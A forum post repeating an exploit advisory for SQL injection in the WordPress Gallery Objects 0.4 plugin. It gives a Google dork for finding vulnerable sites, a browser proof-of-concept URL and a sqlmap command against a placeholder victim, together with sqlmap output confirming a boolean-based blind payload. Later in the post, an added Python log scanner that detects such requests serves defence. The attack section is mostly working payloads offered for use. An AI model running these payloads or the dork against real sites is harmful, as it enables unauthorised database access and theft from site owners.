WordPress Gallery Objects 0.4 SQL Injection
#1
######################
# Exploit Title : WordPress Gallery Objects 0.4 SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://galleryobjects.com/

# Software Link : http://downloads.wordpress.org/plugin/ga...ts.0.4.zip

# Dork Google: inurl:/admin-ajax.php?action=go_view_object

# Date : 2014-07-18

# Tested on : Windows 7 / Mozilla Firefox
#             Windows 7 / sqlmap (0.8-1)
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0



######################


PoC via browser:

Code:
http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html


sqlmap:

sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid

---
Place: GET
Parameter: viewid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---


#####################
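Added example, not part of the original post or the plugin's code: a log check a site owner can run to find requests to the `go_view_object` action whose `viewid` is not a plain integer, which is what the requests in the advisory look like in an access log. It assumes Apache/nginx "combined" log format; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jul/2014:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=go_view_object&viewid=475&type=html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [18/Jul/2014:10:00:07 +0000] "GET /wp-admin/admin-ajax.php?action=go_view_object&viewid=475%20AND%207403=7403&type=html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [18/Jul/2014:10:00:08 +0000] "GET /wp-admin/admin-ajax.php?action=go_view_object&viewid=1+and+1=2&type=html HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [18/Jul/2014:10:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat&viewid=abc HTTP/1.1" 200 20 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [18/Jul/2014:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=go_view_object&type=html HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

# Client IP is the first field; the request line is the first quoted field.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspect_viewid(line):
    """Return (client_ip, decoded viewid) when the line is a go_view_object
    request whose viewid is not a plain integer; otherwise return None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    # parse_qs URL-decodes values, so %20 and + both become spaces.
    params = parse_qs(url.query, keep_blank_values=True)
    if "go_view_object" not in params.get("action", []):
        return None
    for value in params.get("viewid", []):
        if not re.fullmatch(r"[0-9]+", value):
            return m.group("ip"), value
    return None


def scan(lines):
    """Return every (client_ip, viewid) hit found in the given log lines."""
    return [hit for hit in map(suspect_viewid, lines) if hit]


if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}\tviewid={value!r}")
```

Only GET query strings appear in an access log, so the same parameter sent in a POST body is not covered by this check.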
#2
Thanks.
#3
Thanks
People don't change; the only things that change are circumstances and interests...